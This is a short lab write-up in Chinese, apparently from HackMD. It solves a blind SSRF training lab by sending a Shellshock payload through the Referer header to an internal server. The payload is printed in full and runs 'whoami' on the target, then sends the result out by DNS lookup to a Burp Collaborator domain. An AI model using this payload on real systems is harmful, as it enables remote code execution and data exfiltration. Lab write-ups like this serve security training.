SSRF Lab6 - HackMD

# SSRF Lab6 本題 Blind SSRF + Shellshock RCE + OAST外洩的三合一組合技。概要： - 要想辦法透過 Referer header 觸發 SSRF，然後對內部的 `192.168.0.X:8080 server` 發送帶有 Shellshock Payload 的請求。 - 再利用內部 server 回送出 DNS 請求，讓 OS 使用者名稱 (whoami) 被送到 Burp Collaborator，以達到外洩資料的目的。一樣進入網站攔截請求。 ![image](https://hackmd.io/_uploads/B1Fg-8QSeg.png) ![image](https://hackmd.io/_uploads/SJorsI7Bel.png) 先複製我們的子網域。 ``` cwc4774215wks4a7ztwghf4im9s0g44t.oastify.com ``` 然後製作一個 User-Agent： ``` User-Agent: () { :; }; /usr/bin/nslookup $(whoami).cwc4774215wks4a7ztwghf4im9s0g44t.oastify.com ``` - `() { :; };`：Shellshock 攻擊觸發句法 - `/usr/bin/nslookup $(whoami).xxx.oastify.com`：$(whoami)：會在伺服器上執行 whoami，得到 OS 使用者名稱（如 ubuntu 或 apache） - 然後拼成：`ubuntu.cwc47742....oastify.com` - 執行 nslookup，伺服器會做一個 DNS 查詢，我們的 Collaborator 子網域請求。 - 最後在 Collaborator 收到一筆請求，完整域名中就包含了對方的 OS 使用者帳號名。 Referer 為 `http://192.168.0.1:8080`，並用 Intruder 爆破 IP，如果 IP 對了，我們就會收到訊息。 ![image](https://hackmd.io/_uploads/Sk7s2L7Hll.png) ![image](https://hackmd.io/_uploads/ry2A687Heg.png) ``` peter-1Vfr2B ``` ![image](https://hackmd.io/_uploads/SJPP0ImHgl.png) ---